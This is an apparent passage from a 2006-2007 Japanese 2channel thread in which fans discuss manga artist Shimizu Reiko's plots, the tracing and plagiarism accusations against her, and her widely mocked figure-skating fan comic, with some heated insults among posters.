「私は罪人だから月には帰れない」(棒涙)とか、
晶=天人みたいなエピや台詞がイパーイあったような気もするが、
結局何者だったのか最後までわからんかった。
もしかして、人間?

853 :花と名無しさん:2006/12/07(木) 10:40:16 ID:???0
私も売ってしまったのでウロ覚えなのだが、

晶はただの地球人、でも要人のドナー兼家具屋姫の呪い(?)を
かけられたんじゃなかったか。あの呪いは結局「モテてモテて
困っちゃうミャハ☆」という結果しかなかったけど。

854 :花と名無しさん:2006/12/07(木) 20:44:55 ID:???0
>850
幼アキラは、カブチに行った時歓迎会されて喜んでる訳だから、赤ちゃんではなくて
ひらがなぐらいは読める年齢だったのか?って思ってしまった。
(晶の歓迎会の横断幕を碧が汚して、由に助けてもらってる)

生まれてから数年は柏木が自宅で育てて、ちょっとの間カブチに入れて、
4歳の時に障子がマユの話し相手として引き取った、のだろうか。
その間にヨシキの首チョンの儀式を見てしまい、逃げ遅れて
家具屋姫に、背中をぶっすりアザみたいなのを付ける杭みたいなの打たれる。
あの杭に天人菌でも入ってたのかな。だって、どう見ても生まれ方は人間だもんな。

855 :花と名無しさん:2006/12/07(木) 21:22:48 ID:???0
しかし、まゆ母の障子って凄い名前だな。
障害、差し障り、とか、マイナスイメージしかないよ。

856 :花と名無しさん:2006/12/07(木) 21:52:37 ID:???0
>852
月に帰るも何も、ベタな地球の人間だよねえ。
柏木を殺したら罪人とか言ってるけど、それまでの、殺人まではいかないけど、
傷害はいっぱいしてるよね。あれは罪人にはならないレベルなんかって言いたい。

857 :花と名無しさん:2006/12/07(木) 22:27:48 ID:???0
>>855
普通に読んだら「しょうじ」だしなあ。

あれは硝子みたいな、綺麗な感じを狙ってしくじったと見た。

858 :花と名無しさん:2006/12/07(木) 22:33:44 ID:???0
>854
しかも、そのカブチに面会に来た柏木と、幼女晶がぶちゅぶちゅキスしてる。
あの回想シーン、すげぇキモイ。

859 :花と名無しさん:2006/12/07(木) 22:41:02 ID:???0
>849
ただの中二病だよな>晶
魚クレイになりすまして、中国で自分が暴れる理由を、
「自分の中の野蛮な血が・・」とか言ってたけど、
ただたんに、家具屋秘めにつけられた自分のアザを焼いて消しただけで、
何を大げさにって感じだ。

860 :花と名無しさん:2006/12/09(土) 01:03:58 ID:???0
>>781
ものすごく亀レスだけどコレすっごいわろた

861 :花と名無しさん:2006/12/09(土) 16:11:52 ID:???0
まゆって最後どうなったっけ???

862 :花と名無しさん:2006/12/09(土) 18:28:07 ID:???O
空気もしくは背景になりますた。

863 :花と名無しさん:2006/12/10(日) 11:07:56 ID:lX4PeqwU0
>861
最初の飛行機事故にも、カブチのカビ毒にもやられず、中国で売り飛ばされても、
行き倒れになっても死なず、李家にもぐりこんで大食い&高価な食器を
壊しまくり、レイープされても流産(←妊娠は、妄想説アリ)しても、
首の静脈ザックリいっても、変な毒薬飲んでも、致死ガス吸って
解毒剤を心臓にブスーリ刺されても死なず、晶にくっついて
英国王室で、またただ食いの毎日で終わった、ある意味最強キャラ。

864 :花と名無しさん:2006/12/10(日) 11:15:27 ID:???0
>>863
まとめてくれて乙

そこまでして出してたのに、最後は居ないことになっちゃうんだから、ほとほと
清水って何も考えずに話繋げてってんだなあ。

865 :花と名無しさん:2006/12/11(月) 11:10:34 ID:???0
父親には最初からキモがられ、母親は自分と同じ年の少女とベッドイン、
自分は注意をひくためにわざと倒れたりするカマッテチャンになる。
こう書くとかなり深い設定のキャラなのだが…。

866 :花と名無しさん:2006/12/11(月) 11:38:39 ID:???0
設定がひとつも生きてないからなあ。

まゆにこそ拘れば、清水さんってイヤラシイ・卑しい表現だけは妙に偶に
上手いし、ドロドロレズの話で面白かったのかもなー。

867 :花と名無しさん:2006/12/11(月) 12:53:57 ID:???0
ふたを開けてみればフォモだらけ…

つか、男女間のノーマルな恋愛描くのが下手杉。

868 :花と名無しさん:2006/12/11(月) 16:33:14 ID:???0
でもフォモレズも下手だよね。
特にフォモ。

あんまりフォモ漫画には興味が無いけれど面白いならそれでおk派なので
あのヘタレっぷりにはあきれる。

869 :花と名無しさん:2006/12/12(火) 00:10:22 ID:???0
恋愛の機微云々というよりも
人間模様を描くこと自体が苦手だろうシミズンは
だからエレナも訳わからんDQNになるし、ジミー・晶もまた然り

まともなキャラって誰かいたっけ?
どれもこれもどっかいっちゃってるよね

870 :花と名無しさん:2006/12/12(火) 16:14:36 ID:???0
人間ドラマが描けないんだよね。恋愛も含め。
派手なネタでごまかしてるだけ。


871 :花と名無しさん:2006/12/12(火) 20:51:17 ID:???O
ジミーだめですか?
自分さえいなければ全てがうまくいくからと
アートに殺されようとするところなんか感動したんですが…

872 :花と名無しさん:2006/12/12(火) 22:57:16 ID:???O
>>871
個人的にはジミーまでは許容範囲だったよ〜。なんだかなーって部分もあったけど、
漫画のキャラに「まとも」を求め過ぎても意味ないと思うし。


ホモの書き方も、J&Eの頃までは控え目で好きだった
まぁ正確には片方セクスレスだけど。
まゆ→晶とかサットン→ミラーとかを、変に茶化して書くいたり
三頭身キャラを多用するようになって一気に冷めた気がする
あれもジミーまでは許せたんだけど…


873 :花と名無しさん:2006/12/13(水) 05:10:41 ID:???0
うる覚えなんですが、
飛行機爆発などはジミーの仕業ではないって
グランママが言ってたと思うんですが
結局はジミーの仕業だったんでしょうか?

874 :花と名無しさん:2006/12/13(水) 06:47:26 ID:???0
アートに憎まれるためにわざとそう言っただけで、
実際はジミーじゃないでそ。
起こるべくして起こった…というかティルト(ギル)の仕業だったんだっけ??
自分もうろ覚えだわ。

>>870
モニーク自殺と女王の階段シーンは何度読んでもグっとくるんだよなあ。
パクが発覚して、確かに薄っぺらく見てしまうようにはなったけど、
じゃああのシーン以上にグっとくる場面は?と言われると
そんなに多くは出てこない。自分の中ではそれほど好きなシーンなんだよ…。
家具屋以降に関しては激しく同意だけど。
>>派手なネタでごまかしてるだけ。

875 :花と名無しさん:2006/12/13(水) 10:47:31 ID:???0
>>873
どのみち起こる事故を、ティルトが「ジミーがやった」ような予知夢にしてアートに見せてたよ。
人魚は事件事故を予知するだけなんじゃなかったけ。ポルターガイストみたいなのは起こせるけど。

876 :花と名無しさん:2006/12/13(水) 13:14:44 ID:???0
>>873
うる覚えってなに

877 :花と名無しさん:2006/12/13(水) 14:20:43 ID:???0
>>876
マジレスすると2ちゃん語みたいなもの。
ガイシュツとかふいんきみたいな。

878 :花と名無しさん:2006/12/13(水) 15:39:05 ID:???0
>>873は2ちゃんとか関係なく間違えて覚えてるっぽくね?

879 :花と名無しさん:2006/12/13(水) 16:30:08 ID:???0
つか2ちゃん語ではないでしょ。昔からある間違いってだけで。>ふいんきも
873が故意か本気かは知らんが、んなこと別にどーでもいい。

880 :873:2006/12/13(水) 20:33:59 ID:???0
すみません、素で間違えていました。
恥かしいorz
ご指摘ありがとうございます。
勉強になりました。

>>874 >>875
やはりジミーの仕業ではなかったんですね。
アートがジミーを刺そうとした時に、
「何で俺に殺させようとするんだ」「ごめんなさい」みたいなやりとりで
ジミーの仕業だったのかな?と思ってしまって。
スッキリしました。
ありがとうございました。

881 :花と名無しさん:2006/12/13(水) 23:01:03 ID:???0
>>874
あのシーンももやもやするって人がいたし、今までほぼ全部の決めコマ・シーンがパクとか
悪質な真似だったので、あそこも何だか微妙な気持ちになってしまう。

最初のころはパクに関しては逆に突っ込みすぎがウザいなあとか思うこともあったし、検証
もやりすぎと思うこともあった。検証画像なしで思い当たるという意見には証拠を出してから
にすればいいのにと思ってたりもした……

誰かがモヤっとするのよねというシーン、必ず間があいても後から実際に、必ず出てきちゃう
からなあ……
毎回それですごい衝撃だったよ。好きなシーンに限って、だったんで。

882 :花と名無しさん:2006/12/18(月) 17:02:03 ID:???0
落ちてもいいじゃないという方もおられるかと思いますが保守。

883 :花と名無しさん:2006/12/18(月) 18:41:20 ID:3ZL51U2o0
いっそageてみたらどうかな、と。

884 :花と名無しさん:2006/12/18(月) 18:52:04 ID:???0
何だ、また新たなるパク発見かと思ったww

885 :花と名無しさん:2006/12/19(火) 08:31:29 ID:???O
>>874
グッとくる、と言えば
隕石落下直前のルルブ宮廷もそうだけど、
あと食人種の女の子の話も好きだった。
タイトル忘れたけどorz

886 :花と名無しさん:2006/12/19(火) 08:44:01 ID:???O
今でも解らないんだけど、
何故各国要人の子息のドナーが、カブチ島で天女の生贄として育てられていたのか。
殺されたヨシキ?だっけ、彼の本体の両親は高い金払ったにも関わらず、いきなりドナー滅失??
アキラは本州の竹藪に埋められたにも関わらず、なぜか運命のお導きのようにカブチ島に復帰?

本当に行き当たりばったりで、ストーリーなんてまるで設定してなかったんだと実感。

887 :花と名無しさん:2006/12/19(火) 14:35:48 ID:???O
>>886
ドナーを生かしておくのは16歳迄。誕生日が来たら生贄に。
>>885
自分もアレ好きだ。
タイトルは失念。スマン

888 :花と名無しさん:2006/12/19(火) 14:56:47 ID:???0
「22XX」?

889 :花と名無しさん:2006/12/19(火) 18:57:49 ID:???0
にーにーばつばつ

890 :花と名無しさん:2006/12/20(水) 16:08:53 ID:???0
にーにーぺけぺけ

891 :花と名無しさん:2006/12/20(水) 20:00:04 ID:???0
ふーふーえっくすえっくす

892 :花と名無しさん:2006/12/20(水) 21:57:49 ID:???0
とぅえにーとぅだぶるえっくす

893 :花と名無しさん:2006/12/22(金) 18:30:34 ID:???0
にいにいちょめちょめ


894 :花と名無しさん:2006/12/23(土) 00:00:01 ID:???O
22XXは良かった。
個人的には、ああいう佳作を描いてくれるなら、決めゴマ全部パクってても許せる。
もう長編は描いてくれるな。

895 :花と名無しさん:2006/12/23(土) 10:30:03 ID:???0
短編(中編)むきの作家だということに本人と編集が納得してくれればね。
秘密も最初の大統領の話は良かったのに、第九になってグダグダだし。
ひとつの萌えでひとつの作品、と壁に書いて貼っておけばいい。

896 :花と名無しさん:2006/12/23(土) 13:55:31 ID:OdjtShwN0
>決めゴマ全部パクってても許せる。

冗談じゃない。

こうやって自分を甘やかしてきてんのかね、泥水も。

897 :花と名無しさん:2006/12/23(土) 16:19:24 ID:???O
>>896
そりゃ、あなたが清水の単行本を買わなきゃいいだけの話。
本が売れなきゃ作家は干上がる訳だし、私も家具屋12巻以降、コミックスは買ってないよ。
私はもともと清水の絵柄自体がそんなに好きじゃないから、
作品のさして重要ではない一要素として見れるのかもしれない。

898 :花と名無しさん:2006/12/23(土) 16:25:07 ID:???0
>>897
何かズレてない?

899 :花と名無しさん:2006/12/23(土) 16:48:15 ID:???0
>>897
ふーん。で?

900 :花と名無しさん:2006/12/23(土) 18:57:44 ID:???0
パクられ元のファンの言ったら泥水がますます嫌われそうなことを何で
わざわざ言うのかなあ。

マジで本人かといいたくなるww

901 :花と名無しさん:2006/12/23(土) 19:47:22 ID:???0
マジレスで>>897

他のスレなんかでは清水って「絵だけちょっと小綺麗な作家」と扱われてる。
絵だけが褒められているというか。特徴が分かるというか。
それでパクリってのが広まっちゃったんでヤバイねーって言われてんだと思うけど。

897は少数派だと思うよ。清水の絵よりも他の部分に作品としての価値を見出すって。

902 :花と名無しさん:2006/12/23(土) 22:40:23 ID:???0
897って何でこのスレに要るんだろう。
アンチでもなく、ファンでもなく?

903 :花と名無しさん:2006/12/24(日) 05:33:06 ID:???O
旧作ファンだけど素直にそう言えないだけ。

904 :花と名無しさん:2006/12/24(日) 09:52:07 ID:???0
>>901
「絵だけが好き」って意見多かったもんなあ。

今はその絵も駄目になってるけど。

905 :花と名無しさん:2006/12/26(火) 17:41:02 ID:???0
「絵だけちょっと小奇麗な作家」が手抜きゴマ頻発させたら
もう終わりだよ…

906 :花と名無しさん:2006/12/26(火) 21:22:17 ID:???0
パクリは大問題だけど、それなしでももう終わってるんだよなあ。

907 :花と名無しさん :2006/12/27(水) 00:14:06 ID:/lasO3Zt0
ブランクがあったとは言え、今回の秘密の連載読んで、
全4・5回の連載物でも・・・と思った。



908 :花と名無しさん:2006/12/27(水) 00:29:50 ID:???0
短編は良いという意見があるけど、短編もさほど良いとは思えない。
たまに読み返したいと思う短編は、意外と昔のだったりする。
神話とかノアとかメタルとか。

909 :花と名無しさん:2006/12/27(水) 08:43:10 ID:???O
秘密 は大統領よりも、犬と盲目の少年の話の方が良かった。
犬の目を通した世界はなんと平和で愛に満ち溢れているのか…、
ってな下りでモニーク自害以来久々に泣けたんだけど
あれもパクリなんでしょうかorz

910 :花と名無しさん:2006/12/27(水) 16:48:36 ID:???0
>あれもパクリなんでしょうかorz
オリジナルだったとしても今までの行状が読者にこう思わせてしまうんだよね。
やっぱりパクリって恐いよ。

911 :花と名無しさん:2006/12/27(水) 20:57:23 ID:???0
犬と盲目の少年は良かった。比較的最近だからまだ希望は捨てたくないんだが。
あと食人種の女の子の話は確か「彼女の腕を僕は食べるべきだった」って
ところが泣けたんだよ懐かしい…。昔は純粋というかほんと清水だった印象。

912 :花と名無しさん:2006/12/27(水) 23:15:45 ID:NNqi2IOe0
犬と少年の話、突っ込みたいトコもあるし、
性的虐待受けて殺人鬼と化す紋切り型にウヘアーとも思ったけど
青木と父の関係とか、最後の犬視点での画とか、なかなかヨカッタ
しかしあの話で一番良かったのは






薪タンが殆ど活躍しないってとこだな

913 :花と名無しさん:2006/12/27(水) 23:58:34 ID:???0
>>910
思わせるというか、実際パクってクセになって、全部どこかしらやっちゃうように
なるみたいなんだよね。

清水にしても最初のころは擁護してたじゃない、結構な人数が。
ところがどんどん明らかになっていって、気付くと全く無傷のものが極少。
この分だとまたそのうち明らかになるんだろうなとしか思えない域に達している。

914 :花と名無しさん:2006/12/28(木) 01:05:19 ID:???0
青木と父の関係は良かった。それ以外は狙いすぎてて
何かのテンプレ通りに見えて今いち。悪くはないけど。

915 :花と名無しさん:2006/12/28(木) 17:53:18 ID:???0
青木のお父さんの日記、完全に放置プレイだね。
まあ今さら期待もしてなかったけどさ。

916 :花と名無しさん:2006/12/28(木) 19:20:43 ID:???0
日記はあれで完結じゃないの?
ずっと引きずられても鬱陶しいし。

917 :花と名無しさん:2006/12/28(木) 22:42:08 ID:???0
今月のメロディ、嬉しそうにフィギュア描いてましたね〜
織田が一番似てたかな…つか、今日の全日本見ながら清水さんの描いた
ドーナツスピン思い出して笑っちゃったよ。
ごめん、ゆかりん…

918 :花と名無しさん:2006/12/28(木) 22:53:03 ID:???0
>917
また知ったかで書いてんのかな>フィギュア
ウザ。

919 :花と名無しさん:2006/12/28(木) 23:43:32 ID:???0
知ったかというか、十数年離れてたのに伊藤みどり以来現在まで
「メダルを狙えたりたまに取れたりするレベル」って言い切るのはどうよ。
今ほど層は厚くないにしても世界選手権やGPシリーズはその間結構
いい成績残してるのに。なんというか全体的に失礼だった。

920 :花と名無しさん:2006/12/29(金) 00:17:07 ID:???0
ウスペンとウィアーという偏りっぷりに笑った

921 :花と名無しさん:2006/12/29(金) 00:19:16 ID:???0
>919のレス読んだだけでうんざりしてくる。
あほか。
メダルを狙えてたまに取れるっつーのがどんだけすごいことなのかわかってんの?
まあいいや、ちゃんと読んでから言いたいこと言う。

922 :花と名無しさん:2006/12/29(金) 01:35:33 ID:???0
フィギュア詳しくないから内容については言えないけど
やたらテンションが高いのが痛い印象だった

923 :花と名無しさん:2006/12/29(金) 13:17:49 ID:???0
ウィアー好きなのか。わかりやすいwww

924 :花と名無しさん:2006/12/30(土) 05:46:09 ID:???0
て、ゆーかさ
「渡部絵美→伊藤みどり→八木沼純子→佐藤有香→荒川静香と
メダルを狙える、たまにとれるレベル」
って書いてあったんだけど
まだ引退していないからかもしれないけど
村主章枝・荒川静香って書いた方がいいんじゃないの、と思った

荒川さんは2004世界金・2006トリノ五輪金だけど
村主さんは2002・2003と連続して世界銅、2006世界銀とってるんだよ
村主さんの方が1歳上なんだしさあ

925 :花と名無しさん:2006/12/30(土) 05:50:52 ID:???0
そんで、2002〜2006年の5年間のうち4回も
世界フィギュア選手権のメダルをとっているのを
「たまにとれるレベル」って言うのは変だよね、という
(まあ、そのうち2回は五輪シーズンだけども)

926 :花と名無しさん:2006/12/30(土) 06:05:34 ID:???0
荒川さんに、これからお金持ちになってもらって
「スケート選手ってキレイで格好いい上に、お金持ちにもなれるんだ!?」
と子供たちに夢と希望を与えて欲しい、ってのも
なんかモニョったわ

927 :花と名無しさん:2006/12/30(土) 06:07:54 ID:???O
選手を小馬鹿にしてるのは良く分かったよ。

928 :花と名無しさん:2006/12/30(土) 09:08:01 ID:???O
五輪のメダル以外はメダルだと思ってないんじゃね?

929 :花と名無しさん:2006/12/30(土) 15:46:36 ID:???0
今日やっとメロ読んだ。
萌え全開でしたね・・・。
でも期待外れの漫画読まされるよりこっちの方がマシかなと思った。
最初から期待してないからw

930 :花と名無しさん:2006/12/30(土) 16:56:51 ID:???0
にわかの元ファンの自覚があるなら黙ってろつーの。
どうしようもないわ、この馬鹿女。
だいたいみどりまでのフィギュア好きって、お前みどりのこともろくに書けてないだろが。
どうせ他は知らないんだろ。
知ったかぶりの厨2かよ、クソが。

931 :花と名無しさん:2006/12/30(土) 19:23:24 ID:???0
叩きもここまでくると、逆にみんな熱い思いで読み込んでるなと思えてくるわ。
フィギュア好きだけど、今回のメロ見ても
「ふーん、あっそ」以外の何ものでもなかった私は
まだまだ清水への愛憎が足りませんか?w

新しい叩きネタに不足してる分、言葉尻とらえすぎっていうかなんというか。

932 :花と名無しさん:2006/12/30(土) 20:02:11 ID:???0
清水どうでも良くてフィギュア好きな自分は
変な知識を、なにも知らない人に広めて欲しくないと思うよ

933 :花と名無しさん:2006/12/30(土) 22:25:33 ID:???0
>931
言葉尻どころの話かよ?
全ページにわたって殺意を覚えるほどの腐れ加減だったよ。
表面しか見えてない人間のまぜっかえしはいらん。
フィギュア好きにしてみれば清水みたいな奴が一番迷惑なんだよ。
勝ってるときだけ盛り上がって、成績が振るわなかったら見向きもしない。
そんなのがはフィギュア好きなわけあるか。



934 :花と名無しさん:2006/12/30(土) 22:38:59 ID:???0
>933
おおおおお落ち着いて!
これあげるからw

ttp://www.canon.lv/skating2005/gallery/14032005/5.jpg
ttp://img395.imageshack.us/img395/1015/johnnyspin2we.jpg
ttp://editorial.gettyimages.com/source/search/details_pop.aspx?iid=72398385&cdi=0
ttp://editorial.gettyimages.com/source/search/details_pop.aspx?iid=72639880&cdi=0

935 :花と名無しさん:2006/12/30(土) 22:49:26 ID:???O
フィギュア、甲殻、萩尾望都、そして解剖写真にさえ各々熱心な儲が居るというのに
スレ主でありながら誰からも熱心に擁護してもらえないシミズンカワイソス

936 :花と名無しさん:2006/12/30(土) 22:54:17 ID:???0
そのうちフィギュアファンからスケート靴のエッジが送られてきたりして。
シミズン「秘密」をさっさと終らせて立派なフィギュア漫画を描くしか無し?w

937 :花と名無しさん:2006/12/31(日) 00:08:48 ID:???0
>936
描いたとしても所詮ニワカに過ぎないし。
デッサン力もデフォルメ力も入念な下調べも出来ないシミズには描けるわけがない。

938 :花と名無しさん:2006/12/31(日) 15:29:35 ID:???O
某ピザのカエル砂糖姫みたいになったら悲惨だしな…

939 :花と名無しさん:2006/12/31(日) 18:23:59 ID:???0
口では「私はにわか」とか言ってるけど
結局、「私はずっと昔からフィギュアが好きでしたよ」って
主張したいだけなんだと思う…
そういう痛い人っているよね

940 :花と名無しさん:2006/12/31(日) 19:57:18 ID:???0
そんなっ!シミズンは謙虚な方なんです!謙遜してるんです!(`А´)ノ

941 :花と名無しさん:2006/12/31(日) 23:24:43 ID:???0
謙虚な人間は写真を丸写ししたり、でたらめな絵を描いてまで
熱心なファンを装ったりしませんよw

942 :花と名無しさん:2006/12/31(日) 23:32:41 ID:???0
あんまり似ると肖像権に引っ掛かるのでわざと下手に描いたんです!(`А´)ノ

943 :花と名無しさん:2006/12/31(日) 23:40:42 ID:???0
そんなところで謙遜しなくてもw
真央や荒川のイナ、ビットなんかは写真どおりに良く描けていましたよw

944 : 【ぴょん吉】 【759円】 :2007/01/01(月) 19:31:04 ID:???0
吉なら新シリーズ発表。

945 :花と名無しさん:2007/01/03(水) 13:02:32 ID:???0
シミズンファソは正月をまともに過ごしてる人が多い模様・・・。
このスレに出入りしてるのは自分だけかw

946 :花と名無しさん:2007/01/03(水) 21:03:16 ID:???O
主たる年齢層考えるとそうだろうね @帰省中

947 :花と名無しさん:2007/01/04(木) 22:12:15 ID:???0
柴田も好きらしいので納得した

948 :花と名無しさん:2007/01/07(日) 13:15:06 ID:???0
メロディ読んだ。柴田好き、ジョニーとウスペン好き、て本当分かりやすいね。

言葉では褒めてるけど村主さん嫌いなのか?とオモタ。
失敗した福笑いみたいにかなり顔崩して描いてたな…。
それと、高橋をもちっとまともに描いてほしかった。
あれじゃどこぞの山賊の親分みたいだorz

949 :花と名無しさん:2007/01/09(火) 03:24:26 ID:???0
確かにわかりやすいなあw>ジョニーとウスペン
ジュべあたりも好みっぽいと思うんだけどなあ。
足がもっと長かったら萌えられてたのかな。危なかった…

てかしっかり描いてるのが五輪でいうと 〜リレハンメル→トリノ〜
と、長野・塩湖をかっとばしてる辺り、本当に離れてたんだねw
この期間もずっと見てたらネタにされそうな選手いっぱいいるはずだし。
日本人フィーバー時のみ騒ぐ程度で語ってほしくない。本当にウザい。

950 :花と名無しさん:2007/01/09(火) 14:42:19 ID:???0
ジュべはムチムチしてるから駄目なんじゃない?

951 :花と名無しさん:2007/01/10(水) 00:06:52 ID:???0
やっと読んだ>>921だが。
案の定ひどい内容だった。
同意見がレスされてるので安心したけど。
ベステミアノワ&ブキン組についても過去にずれた発言してたけど、
「伝説の」トービル&ディーンもとんちんかんもいいとこだね。
彼らの顔、体型、衣装、髪型、すべてが間違っている。
どうせ別ペアの適当な写真か画像丸写ししたんだろうね。
読者なめてるわ。
嘘ついてまでフィギュア好きを騙りたいど厚かましさに、吐き気がする。

952 :花と名無しさん:2007/01/10(水) 01:08:12 ID:???0
勝ち馬に乗っかりたい人間はどこにでもいるよね。
フィギュアスレでもニワカがウザいことw
これで日本選手がグダグダになったらあっさり無視するんでしょうね。

953 :花と名無しさん:2007/01/10(水) 01:15:34 ID:???0
相変わらず似顔絵(模写?)上手くないねw

954 :花と名無しさん:2007/01/12(金) 23:12:38 ID:xt8rx/zw0
躁躁躁躁躁■■▼躁躁躁躁躁躁▼■▼躁躁躁躁躁躁躁躁躁
躁躁躁躁▼■■躁躁躁躁躁躁躁■■▼躁躁躁躁躁躁躁躁躁
躁躁躁▼■■▼躁躁躁躁躁躁▼■■▼▼▼▼■■▼躁躁躁
躁躁躁■■■躁躁▼▼躁躁躁▼■■■■■■■■■▼躁躁
躁▼▼■■▼躁▼■■▼躁▼■■▼▼▼▼▼■■■躁躁躁
▼■■■■▼▼■■▼躁躁▼■■■躁躁躁▼■■▼躁躁躁
▼■■■■▼▼■▼躁躁▼■■▼■▼躁▼■■■躁躁躁躁
躁▼■■■■■■▼躁▼■■▼▼■■▼■■■▼躁躁躁躁
躁躁▼■■■■▼▼躁▼■▼躁躁▼■■■■▼躁躁躁躁躁
躁躁躁▼■■▼▼■▼躁▼躁躁躁躁▼■■■躁躁躁躁躁躁
躁躁躁▼■■躁躁■■▼躁躁躁躁躁▼■■▼▼躁躁躁躁躁
▼▼▼■■■▼■■■■▼躁躁▼▼■■■■■▼躁躁躁躁
■■■■■■■■▼■■▼▼■■■■▼■■■■■■▼▼
■■▼▼▼■■躁躁▼▼■■■■▼▼躁躁▼■■■■■▼
▼▼▼躁躁■■躁▼▼▼■■■▼▼■▼▼▼▼■■■■▼
躁■■■▼■■▼■■▼■■▼躁▼■■■■▼▼▼▼▼躁
躁■■■▼■■▼■■▼▼▼躁躁▼■■■■■■▼躁躁躁
躁■■■▼■■躁▼■■躁躁躁躁躁▼▼■■■■▼躁躁躁
▼■■■躁■■躁▼■■▼躁躁▼躁躁躁▼■■▼躁躁躁躁
▼■■■躁■■躁躁■■▼躁▼■■▼▼▼躁躁躁躁躁躁躁
▼■■▼躁■■躁躁■■▼躁▼■■■■■▼▼躁躁躁躁躁
▼■■▼躁■■躁躁▼▼躁躁▼■■■■■■■■▼▼躁躁
▼■■▼躁■■躁躁躁躁躁躁躁▼▼■■■■■■■▼躁躁
躁躁躁躁躁■■躁躁躁躁躁躁躁躁躁躁▼■■■■■▼躁躁
躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁躁

955 :花と名無しさん:2007/01/16(火) 05:12:05 ID:qpo6ETWQO
清水先生のイラスト好きでこのスレみつけたんだが…

マジでか!トレースばっかじゃん!!ショックが大きいorz

956 :花と名無しさん:2007/01/16(火) 13:55:57 ID:???0
久しぶりに、短編読み返した。
天使達の進化論と、22××。

あの頃が一番好きだったな〜

957 :花と名無しさん:2007/01/16(火) 14:09:10 ID:???0
自分は「月の子」中盤辺りがピークで後は下降の一途でつ・・・。

958 :花と名無しさん:2007/01/16(火) 14:25:05 ID:???0
本棚漁ってたら月の子を発見して数年ぶりに読んだので
どっか語れる所あるかなーと思ってこのスレを見つけたんだけど激しく場違いのようす
なぜか中盤の巻がごっそり抜けてたので買い直しに逝きつつ他当たります…

959 :花と名無しさん:2007/01/16(火) 14:35:33 ID:???0
語っても全然おk。
ファンサイトのように好意100%の反応を望むなら
やめたほうがいいけど。

…って、もう他当たってるのか。

960 :花と名無しさん:2007/01/16(火) 21:37:30 ID:???0
別板にうpされてたスケート漫画見たんだけど。
「エアロ(浅田真央の飼い犬)の犬種忘れた、チワワ?トイプードル?」
とか言いながら、描いてある犬はどう見てもヨークシャーテリア系のキモイい物体。
ちっとは調べて体裁整えろ。

961 :花と名無しさん:2007/01/16(火) 23:26:18 ID:???0
その漫画のurlキボン。

962 :花と名無しさん:2007/01/17(水) 00:47:45 ID:???0
あ、ごめん誤解させたかな。
うpされていたのは既出の清水のスケ萌え漫画の一ページです。

963 :花と名無しさん:2007/01/17(水) 14:02:48 ID:WrOJOKFT0
なんでまたそんなものがw

964 :962:2007/01/18(木) 00:24:31 ID:???0
>963
なんでってそりゃあんた、スケスレでしたからw


965 :花と名無しさん:2007/01/18(木) 00:41:31 ID:???0
スレでの評判はどうだった?というか、どのような経緯で貼られたんだろうw

966 :花と名無しさん:2007/01/18(木) 00:49:29 ID:???0
自分の目で確かめてくれ…高橋と織田のとこだ。
ちょ…今、ショックな情報が。
ランビマジかよ!

967 :花と名無しさん:2007/01/18(木) 01:26:36 ID:???0
スケート板、すごいスレ多いのね・・・見つけられなかった。
スケ萌え漫画観た事なかったから残念。

968 :花と名無しさん:2007/01/18(木) 04:48:52 ID:???0
今見たら、似てない、ひどい、って大評判だった
↓これがウケタwww左:織田、右:高橋

>もうね。
>こっち↓の方がよっぽど似てると思うのよ。かわいいし。
>
>  ノノ'ヽ   ∫ノ∫
> (`ω´)ノシ ( ゚◇゚)ノシ

969 :花と名無しさん:2007/01/18(木) 05:21:19 ID:???0
見つけたのDLして、うpしなおしてみた
12P(内フィギュアネタ10P)の、最初の3P分だった

ttp://vista.jeez.jp/img/vi6906504700.jpg
ttp://vista.jeez.jp/img/vi6906507545.jpg
ttp://vista.jeez.jp/img/vi6906510061.jpg

970 :花と名無しさん:2007/01/18(木) 12:53:37 ID:???0
>>969
d。見れました。1P目の真央ちゃんのアップがたれ目気味で似てかわいい。
柴田君に思い入れあるのがよくわかるw

971 :花と名無しさん:2007/01/18(木) 17:00:34 ID:???0
月の子

972 :花と名無しさん:2007/01/18(木) 17:13:47 ID:???0
>>969
資料見て描いてこの絵かよ…
そもそも関節むちゃくちゃだし。ゴム人間か。
やる気ねぇなぁオバハンって感じ

973 :花と名無しさん:2007/01/18(木) 17:38:27 ID:???0
こーいうのは単行本の空きページか自分のHPつくってそこでやれよ…ってレベルだな。
こんだけ2323しく絵が劣化した作家も珍しいんじゃない?

974 :花と名無しさん:2007/01/18(木) 17:48:36 ID:???0
うあ。縮小した方が酷い絵って初めて見た(゚Д゚;)
雑誌サイズの方がマシに見えた。

975 :花と名無しさん:2007/01/18(木) 21:24:43 ID:???0
>969
トン。
ちょっと落ちつけオバサンて感じだ。
ひどい、ひどすぎるよ。
読んでるこっちが恥ずかしいよ。

976 :花と名無しさん:2007/01/18(木) 21:46:18 ID:???O
村/主がキモ杉る件について

977 :花と名無しさん:2007/01/18(木) 21:48:17 ID:???0
なーんかシミズンの絵って蝋人形っぽいんだよなー……
塚、服の皺とかがデフォルメされすぎてて気持ち悪い

978 :花と名無しさん:2007/01/18(木) 22:31:31 ID:???0
酷すぎる…
選手達に何か恨みでもあんのか

979 :花と名無しさん:2007/01/18(木) 22:43:54 ID:???0
スグリンとオダがテラヒドス
犬がチワワでもトイプードルでもないのにはびっくりする

980 :花と名無しさん:2007/01/18(木) 22:51:18 ID:???0
もうちょい前なら迷うことなく資料写真をトレースしてたんだろうな。
目トレスだとこんな酷いことに。
似せようとした努力は買うけど、でもちょっと…

しかし美形萌えだけのニワカがヲタのフリしてキャーキャー騒いでいるのは
これほど見苦しいとは。
清水先生、もう萌えエッセイは止めてください。お願い。

981 :花と名無しさん:2007/01/18(木) 23:14:39 ID:???0
最後に無理やり「秘密」出してたけど、それがまた間抜けぶりをさらす結果に。
「真央といえば大地真央」
そこまで言うなら浅田の名前は大地真央ファンの父親に由来、まで書いとかなきゃ。
つーか、書かないのが不自然。
やっぱり無知のにわかだなぁ、みっともない。

982 :花と名無しさん:2007/01/19(金) 01:20:32 ID:???0
村/主の目がかなりロンパってる件

983 :花と名無しさん:2007/01/19(金) 09:19:27 ID:???0
今から次スレ立ててくるノシ

984 :花と名無しさん:2007/01/19(金) 10:08:11 ID:???0
清水玲子スレッド25
http://comic7.2ch.net/test/read.cgi/gcomic/1169168662/

移動ヨロ

985 :花と名無しさん:2007/01/19(金) 23:04:31 ID:???0
>>969
ホント絵が酷くなったな。

布の質感、全部溶け掛けてる感じで気持ち悪い、
布、多すぎ。

986 :花と名無しさん:2007/01/20(土) 01:43:54 ID:???0
>>969
■1枚目
